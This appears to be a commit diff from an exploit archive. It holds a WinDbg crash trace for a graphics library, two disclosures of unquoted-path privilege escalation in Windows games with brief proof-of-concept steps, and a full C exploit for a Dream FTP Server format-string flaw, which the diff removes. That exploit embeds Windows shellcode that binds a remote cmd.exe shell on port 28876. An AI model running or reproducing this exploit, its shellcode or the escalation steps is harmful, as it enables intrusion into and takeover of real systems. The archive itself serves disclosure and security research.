4417507c 5d pop ebp
4417507d c21000 ret 10h
44175080 55 push ebp
44175081 8bec mov ebp,esp
> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0013e3a8 440787db 0ab4aea0 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e
0013e3c8 44078543 0000401d 00000000 00000000 OGL!GdipGetPathPointsI+0x2da6
0013e3f8 440784cd 0000015c 07915974 07915028 OGL!GdipGetPathPointsI+0x2b0e
0013e410 77f2067f 2f011136 012f2750 07915904 OGL!GdipGetPathPointsI+0x2a98
0013e490 44074c79 2f011136 404ccccc 4407840d GDI32!SetMetaRgn+0x87
0013e4c8 44078750 2f011136 3e460aa3 0013e548 OGL!GdipCreateMetafileFromWmfFile+0x652
0013e568 440785a8 43487fff 3e460aa3 0013e6a0 OGL!GdipGetPathPointsI+0x2d1b
0013e6b8 44074b9a 00000000 42c00000 42c00000 OGL!GdipGetPathPointsI+0x2b73
0013e7b4 4402cfc4 0ab4a320 00000000 00000000 OGL!GdipCreateMetafileFromWmfFile+0x573
0013e818 4403e16f 0ab4a320 0013e840 0013e850 OGL!GdipGetVisibleClipBoundsI+0x1c6
0013e888 438e7d74 00000000 00000000 00000000 OGL!GdipDrawImageRectRect+0x111
0013e998 437a4f9f 0874a780 07aeec68 ad01865f gfx+0x147d74
0013ea64 437b3ec8 0874a780 00000001 0722b898 gfx+0x4f9f
0013ea78 437b3ec8 0874a780 00000000 0722b848 gfx+0x13ec8
0013ea8c 437b3ec8 0874a780 0013eb40 0b06f120 gfx+0x13ec8
0013eaa0 437a4ecd 0874a780 ad018713 0013ee04 gfx+0x13ec8
0013eb28 437aed1a 0722b848 0013eb40 0013f194 gfx+0x4ecd
0013eb70 437aecef 0b06f120 0013ebac 0013f194 gfx+0xed1a
0013eb88 437aecc3 086f2410 0013ebac 0013f194 gfx+0xecef
0013ebf4 437af6fc 0013ec80 086f2410 00000002 gfx+0xecc3
----------------------------------------------------------------------
0:000> u eip
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4]
44175086 ff31 push dword ptr [ecx]
44175088 8b4d08 mov ecx,dword ptr [ebp+8]
4417508b 8b01 mov eax,dword ptr [ecx]
4417508d ff5004 call dword ptr [eax+4]
44175090 8bc8 mov ecx,eax
44175092 e8922bebff call OGL!GdipDeletePen+0x115 (44027c29)
44175097 5d pop ebp
0:000> kvn1
# ChildEBP RetAddr Args to Child
00 0013e308 440787db 08f22870 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e
0:000> dd ecx+4
00000004 ???????? ???????? ???????? ????????
00000014 ???????? ???????? ???????? ????????
00000024 ???????? ???????? ???????? ????????
00000034 ???????? ???????? ???????? ????????
00000044 ???????? ???????? ???????? ????????
00000054 ???????? ???????? ???????? ????????
00000064 ???????? ???????? ???????? ????????
00000074 ???????? ???????? ???????? ????????
0:000> u eip-11
OGL!GdipGetImageThumbnail+0x1117d:
44175072 ff5004 call dword ptr [eax+4]
44175075 8bc8 mov ecx,eax
44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a)
4417507c 5d pop ebp
4417507d c21000 ret 10h
44175080 55 push ebp
44175081 8bec mov ebp,esp
44175083 ff7104 push dword ptr [ecx+4] <= crash
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
----------------------------------------------------------------------
By: HauntIT Blog @ 2016

0
platforms/windows/local/39102..py → platforms/windows/local/39102.py
View file

0
platforms/windows/local/39809..cs → platforms/windows/local/39809.cs
View file

34
platforms/windows/local/39814.txt Executable file
View file

@ -0,0 +1,34 @@
-----------------------------------------------------------------------------------------------------------------
# Exploit Title: Multiples Nexon Games - Privilege Escalation Unquoted path vulnerabilities
# Date: 13/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://www.nexon.net/
# Softwares Links: http://dirtybomb.nexon.net/ (DirtyBomb)
# http://store.steampowered.com/app/273110/ (CSNZ)
# Versions: Dirty Bomb r56825 USA_EU / CSNZ : 0.0.18845.1
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
Description : Multiples Nexon Game, including but not limited to Dirty Bomb
and Counter-Strike Nexon : Zombies, are Prone to unquoted path
vulnerability. They fail to quote correctly the command that call for
BlackXcht.aes, which is a part of the anti-cheat system (Nexon Game
Security). Probably all Nexon games calling this file are affected.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system.
POC :
Put a software named Program.exe in C:
Launch the game via steam
When BlackXcht.aes is called, Program.exe is executed with same rights as
steam
POC video : https://www.youtube.com/watch?v=wcn62GGwtcQ
Patch :
Patch for Dirty bomb - Upgrade to r57457 USA_EU
-----------------------------------------------------------------------------------------------------------------

38
platforms/windows/local/39820.txt Executable file
View file

@ -0,0 +1,38 @@
-----------------------------------------------------------------------------------------------------------------
# Exploit Title: Hex : Shard of Fate 1.0.1.026 - Privilege
Escalation Unquoted path vulnerability
# Date: 15/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://gameforge.com
# Software Link: https://hex.gameforge.com/ or via steam
# Version: 1.0.1.026 and probably prior
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
Summary : Hex: Shard of Fate is a new breed of digital card game, combining
classic TCG gameplay with elements of an online RPG
Description : The game executable is prone to an unquoted path
vulnerability. When you go to the in-game store it fail to quote the
following command which is used multiple times :
C:/Program Files (x86)/Steam/steamapps/common/HEX SHARDS OF
FATE/Hex_Data/StreamingAssets/uWebKit/Windows/x86/UWKProcess.exe -parentpid
5808
-processdb QzovVXNlcnMvVXRpbGlzYXRldXIvQXBwRGF0YS9Mb2NhbExvdy9IRVggRW50ZXJ0YWlubWVu
dC9IZXgvdVdlYktpdFByb2Nlc3MuZGI=
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system.
POC :
Put a software named Program.exe in C:
Launch the game or steam with high privileges and go to store
POC video : https://www.youtube.com/watch?v=E1_1wZea1ck
Patch :
Still waiting, no reward so full disclosure after 10 days
-----------------------------------------------------------------------------------------------------------------

2
platforms/windows/remote/22365.pl
View file

@ -1,3 +1,5 @@
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: http://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.

2
platforms/windows/remote/22367.txt
View file

@ -1,3 +1,5 @@
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: http://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.

102
platforms/windows/remote/23661.c
View file

@ -1,102 +0,0 @@
source: http://www.securityfocus.com/bid/9600/info
It has been reported that Dream FTP Server may be prone to a remote format string vulnerability when processing a malicious request from a client for a username during FTP authentication. The issue could crash the server.
Dream FTP Server version 1.02 has been reported to be prone to this issue, however, it is possible that other versions may be affected by this issue as well.
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
// WIN NT/2K/XP cmd.exe shellcode
// kernel32.dll baseaddress calculation: OS/SP-independent
// string-save: 00, 0a and 0d free.
// portbinding: port 28876
// looping: reconnect after disconnect
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
"\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
"\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
"\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
"\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
"\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
"\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
"\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
"\x83\xc4\x5c\x61\xeb\x89";
int main(int argc, char *argv[], char *envp[]) {
int sock;
FILE* FILEsock;
struct sockaddr_in addr;
int port = 21;
char buffer[1024];
if (argc<2 || argc>3) {
printf("Usage: %s IP [PORT]\n", argv[0]);
exit(-1);
}
if (argc == 3) port = atoi(argv[2]);
printf("- Nightmare --------------------------------------------------\n"
" Dream FTP v1.2 formatstring exploit.\n"
" Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
" Credits for the vulnerability go to badpack3t\n"
" <badpack3t@security-protocols.com>.\n"
" Shellcode based on work by H D Moore (www.metasploit.com).\n"
" Greets to everyone at 0dd and #netric.\n"
" (K)(L)(F) for Suzan.\n"
"\n"
" Binds a shell at %s:28876 if successfull.\n"
" Tested with: WIN2KEN/Dream FTP v1.2 (1.02/TryFTP 1.0.0.1)\n"
"--------------------------------------------------------------\n",
argv[1]);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 ||
connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1 ||
(FILEsock = fdopen(sock, "r+")) == NULL) {
fprintf(stderr, "\n[-] Connection to %s:%d failed: ", argv[1], port);
perror(NULL);
exit(-1);
}
printf("\n[+] Connected to %s:%d.\n", argv[1], port);
do printf(" --> %s", fgets(buffer, sizeof buffer, FILEsock));
while (strstr(buffer, "220-") == buffer);
printf("\n[+] Sending exploit string...\n");
fprintf(FILEsock,
// Argument 10 points to the SEH handler code, it's RWE so we'll change
// the SEH handler to redirect execution to the beginning of our
// formatstring. When the SEH handler is called [ebx+0x3c] points
// to the start of our formatstring, we just have to jump over the
// formatstring exploit itself to our shellcode:
"\xeb\x29" // Jump over the formatstring exploit
"%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n" // Argument 10 -> SEH
"%%n" // Causes exception after SEH adjustment.
"@@@@@@@@" // nopslide landing zone for jump
"%s\r\n", // shellcode
0x3C63FF-0x4f, // New SEH code = 0x3C63FF (jmp *0x3c(%ebx) | jmp [EBX+0x3C])
shellcode);
fflush(FILEsock);
close(sock);
printf("\n[+] Done, allow a few seconds on a slow target before you can\n"
" connect to %s:28876.\n", argv[1]);
return 0;
}